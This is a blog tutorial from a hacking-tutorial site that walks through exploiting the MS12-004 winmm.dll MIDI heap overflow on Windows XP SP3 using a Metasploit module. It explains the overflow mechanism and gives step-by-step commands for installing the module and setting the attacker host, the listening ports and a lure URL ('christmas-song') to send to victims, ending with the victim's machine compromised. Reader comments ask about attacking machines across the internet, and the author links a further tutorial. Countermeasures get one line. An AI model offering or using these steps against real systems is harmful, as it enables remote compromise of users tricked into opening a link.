4 Steps Hacking XP SP3 MS12-004 midiOutPlayNextPolyEvent Heap Overflow
Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R1
Victim O.S : Windows XP SP3
Vulnerable Application : Windows Multimedia Library (winmm.dll)
Exploit Credits : Shane Garrett, Juan Vazquez, Sinn3r
This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player's ActiveX control.
Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than how much is available on the heap (0×400 allocated by WINMM!winmmAlloc), and then allowing us to either "inc al" or "dec al" a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user.
At this time, for IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention).
Note: Based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.
Requirements :
1. Metasploit Framework (Windows/Linux)
2. ms12_004_midi.rb exploit (download link )
Mediafire.com
Step by Step :
Attacker IP Address : 192.168.1.7
Victim IP Address : 192.168.1.6
1. Download the exploit above and then copy to destination folder by using following command :
cp ms12_004_midi.rb /pentest/exploits/framework/modules/exploits/windows/browser/
2. Run your metasploit framework using msfconsole command and then use the exploit you've just added on step 1.
3. On the next step you can view available switch by running show options command. In this example below only important switch to make exploit running without problem.
Information :
set srvhost 192.168.1.7 --> attacker server host(attacker ip address) set srvport 80 --> set local port that open to receive connection from victim set uripath christmas-song --> social engineering links set lhost 192.168.1.7 --> set lhost ip address to receive payload set lport 443 --> set local port to receive payload connection from victim exploit --> run the exploit http://192.168.1.7/christmas-song --> link to send to victim
4. When victim open malicious link, our backtrack console shows active session and we can get into their computer 
Pwned!
Countermeasures :
1. Always update your windows. If you're using Win XP, you can migrate to windows 7.
Hope you enjoyed
Incoming search terms:
- ms12-004
- how to hack xp with kali with step
- hack windows xp sp3 backtrack
- hacking windows xp sp3 with backtrack
- Steps on how to hack windows xp
- steps on how to hack window xp
- steps on how to hack windows by xp
- Steps on hw to hack windows xp
- what are the steps involved when hacking window xp
- windows xp hacking steps
Written by Vishnu Valentino.
Founder of hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com
See all posts by v4L || Visit Website : http://www.vishnuvalentino.com
Popular Posts
5 Responsesto “4 Steps Hacking XP SP3 MS12-004 midiOutPlayNextPolyEvent Heap Overflow”
Leave a Reply
Links
Get Updates via Networkedblogs
Funziona tutto alla Grande… solo che se notiamo tutto è fatto nella LAN locale in LocalHost , il tutto sarebbe bello farlo in OUT-SIDE … o meglio dal pc remoto verso un atro IP, ma quello che sembra il problema è come fare il Bay-Pass del Router per entrare nella Lan e vedere i PC?
#osettobubu
you can refer my tutorial here about how to hack from WAN http://www.hacking-tutorial.com/computer/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/
Sorry I can’t wrote italian language
No, non puoi farlo da internet per via del router/firewall che, come hai intuito, molto probabilmente bloccherebbe i pacchetti in arrivo.
No, you cannot do that from the internet because of the router/firewall that very likely would block the incoming packets.
#Reginald
http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/
Download SecurityTube Metasploit Framework Expert DVD FREE Enjoy
securitytube-training.com/certifications/securitytube-metasploit-framework-expert/?id=download 